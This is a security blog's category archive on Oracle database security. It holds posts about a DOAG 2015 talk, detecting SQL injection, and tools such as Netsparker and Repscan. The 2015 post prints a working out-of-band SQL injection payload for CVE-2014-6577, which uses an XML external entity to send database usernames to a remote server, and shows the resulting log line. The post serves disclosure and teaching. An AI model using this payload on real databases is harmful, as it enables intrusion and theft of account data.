Archive for the ‘Allgemein’ Category

DOAG 2015: Best of Oracle Security 2015

Donnerstag, November 19th, 2015

Yesterday I gave my yearly presentation “Best of Oracle Security 2015” at the DOAG 2015 conference in Nürnberg. In this presentation I showed different Oracle exploits I found/modified released in 2015 in various sources.

One of the most interesting Oracle bugs in 2015 was CVE-2014-6577 (found by Trustwave, affecting,,, 12.1.02, fixed in April 2015 CPU). This bug can be used as helper function in Out-of-band-SQL Injection attacks. Since Oracle 11g the way via utl_http/httpuritype was closed using the ACLs. This exploit opens the possibility in 11g/12g again (if patches are not applied).

—— Out-of-Band SQL Injection Example —————-′ or  1=extractvalue(xmltype(‚<?xml version=“1.0″ encoding=“UTF-8″?><!DOCTYPE root [ <!ENTITY % remote SYSTEM „’||substr((select sys.stragg(distinct username||‘-‚) as string from all_users),1,220)||'“> %remote; %param1;]>‘),’/l‘) – – [18/Nov/2015 00:48:02]  „GET /A=ANONYMOUS-APEX_040200-APEX_PUBLIC_USER-APPQOSSYS-AUDSYS-C HTTP/1.0“ 404 –

—— Out-of-Band SQL Injection Example —————-

Details about a critical design flaw (using unsalted MD5 as 12c password hash) in Oracle 12c will be published in another blog entry.

Self-Defending Databases

Freitag, November 2nd, 2012

I just uploaded my talk Hashdays 2012 „Self-Defending Databases“ to the Red-Database-Security website.  The talk explains how to detect SQL Injection attacks in databases (Oracle/MSSQL/MySQL) and how to react in case of a SQL Injection (e.g. done with Pangolin, Havij or Netsparker).

Initially the idea covered only Oracle and MSSQL but Xavier Mertens extend the concept to MySQL (MySQL Attacks Self-Detection) after he saw my presentation at the Hashdays Management Session.

Cool Web Application Scanner: Netsparker Community Edition

Donnerstag, April 8th, 2010

Today I want to present the Netsparker Community Edition.

Netsparker (from Mavituna Security) is the best web application scanner I know. Easy to use and a really good web application scanning results.  It saved me a lot of time and helped me to find security bugs in Oracle applications (Enterprise Manager).

The best thing: The new community edition is free (OK, with some limitations).

The commercial versions have even more interesting features like Time Based Blind SQL Injection, Remote Code Injection, OS Level Command Injection , CRLF / HTTP Header Injection / Response Splitting, …. The entire feature (and price) list is available here.

Here is a screenshot from Netsparker:

Netsparker Community Edition

If you are interested just download the community edition.

László Tóth published his Hacktivity presentation & a tool called pytnsproxy

Mittwoch, März 24th, 2010

Today Laszlo sent me an email that he published the English version of his Hacktivity 2009 talk „Oracle authentication“ on his webpage. Laszlo was so nice to give me an English private session last year at the Hacktivity in Budapest.

His presentation contains the following topics:

I like the part where Laszlo shows how to hijack an Oracle session.

This presentation is a must for everyone interested in the Oracle authentication process.

Well done Laszlo.

New Repscan 3.0 is available

Dienstag, Februar 23rd, 2010

The latest version 3.0 of our database scanner Repscan is now available. This new version supports MS SQL Server and Oracle databases. Repscan comes with a large amount of new features and a complete new GUI (First database scanner with Office-2007 UI).

Repscan 3.0

Here some of the new features of Repscan 3.0:

  • Support for MS SQL Server (2000, 2005, 2008)
  • Extremely user-friendly database configuration wizard (screenshot)
  • Flexible tree control (re-group databases by status, hierarchy, …) (screenshot)
  • Database security browser with drill down functionality (PDF, XLS, … export) (screenshot, screenshot)
  • New reports (performance, used_features, …)
  • Data Discovery (SSN, PII, Creditcard, Passwords, …)
  • Database Enumeration (custom, NMap support) (screenshot)
  • Pentest Features (Guess SID, Check default username/password combinations, …)
  • Exploit & Code Library (screenshot)
  • Version and Patch Information
  • Skins

Here some (old) features of Repscan:

  • Password plugin architecture
  • Password plugins for Oracle DES, SHA1, OID, APEX, OVS
  • Commandline features
  • PL/SQL Source Code Analysis Report

Here some statements of Repscan 3.0 users:

„Repscan Rocks“, „I must have this tool.“, „Very cool stuff“, „really like the clean interface… checks are great“, „…tend to be more Oracle security information hub than just scanner :-)“

Over the next  few weeks I will show here more details of some Repscan 3.0 features.

If you want to test Repscan 3.0 you can download it from our exclusive distributor Sentrigo